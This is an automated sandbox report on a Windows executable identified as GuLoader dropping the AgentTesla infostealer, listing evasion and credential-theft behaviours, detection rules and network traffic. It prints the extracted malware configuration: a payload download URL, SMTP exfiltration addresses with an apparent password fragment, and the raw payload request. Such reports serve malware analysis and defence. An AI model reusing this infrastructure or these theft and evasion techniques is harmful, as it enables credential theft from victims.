Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Inject.11626.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Inject.11626.exe
Analysis ID:635338
MD5:dd43bd8cdc55dd9c8a168f7d5e67db30
SHA1:b7b49d8b277b6cb3d3006e912ad78558872119fb
SHA256:7dc00d4ca525d39db7c57bcbcf2a17720f3e1d2eaecfc714f5e28f0e2a09633b
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Contains functionality to detect virtual machines (SMSW)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.Trojan.Inject.11626.exe (PID: 4336 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: DD43BD8CDC55DD9C8A168F7D5E67DB30)
    • CasPol.exe (PID: 1888 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 9124 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "muhasebe@parkhotelizmir.comzHhYkTCp0(bkmail.parkhotelizmir.comsaleseuropower2@yandex.com"}
{"Payload URL": "http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000000.14824947099.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries
            No Sigma rule has matched
            Timestamp:192.168.11.2045.10.148.33497635872030171 05/27/22-19:42:44.865082
            SID:2030171
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.2045.10.148.33497635872840032 05/27/22-19:42:44.865135
            SID:2840032
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20185.222.57.7949754802018752 05/27/22-19:41:07.264505
            SID:2018752
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1"}
            Source: CasPol.exe.1888.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "muhasebe@parkhotelizmir.comzHhYkTCp0(bkmail.parkhotelizmir.comsaleseuropower2@yandex.com"}
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeVirustotal: Detection: 11%Perma Link
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040290B FindFirstFileW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,

            Networking

            barindex
            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49754 -> 185.222.57.79:80
            Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49763 -> 45.10.148.33:587
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49763 -> 45.10.148.33:587
            Source: Malware configuration extractorURLs: http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1
            Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
            Source: Joe Sandbox ViewASN Name: EKSENBILISIMTR EKSENBILISIMTR
            Source: global trafficHTTP traffic detected: GET /SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.57.79Cache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49763 -> 45.10.148.33:587
            Source: global trafficTCP traffic: 192.168.11.20:49763 -> 45.10.148.33:587
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.79
            Source: CasPol.exe, 00000005.00000002.19759961032.000000001D813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000005.00000002.19734742085.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.79/SALES/muhasebe
            Source: CasPol.exe, 00000005.00000002.19759961032.000000001D813000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2HBIa742d4finT.com
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Attribution
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Distribution
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Notice
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#Reproduction
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drString found in binary or memory: http://creativecommons.org/ns#ShareAlike
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000005.00000002.19760423479.000000001D872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.parkhotelizmir.com
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, FRATERNATE.exe.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yogqTE.com
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: mail.parkhotelizmir.com
            Source: global trafficHTTP traffic detected: GET /SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.57.79Cache-Control: no-cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

            System Summary

            barindex
            Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00406D5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E21BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339CE66
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339DF3D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03395526
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398515
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03396101
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398563
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B95
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A3A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398626
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03395810
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03396812
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03396616
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398877
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033968BB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033966A3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339E899
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339EEF9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339F0EF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033966CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398ECB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398EC2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01001130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01004320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01003A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0100CCB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0100BF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01003708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010818C0
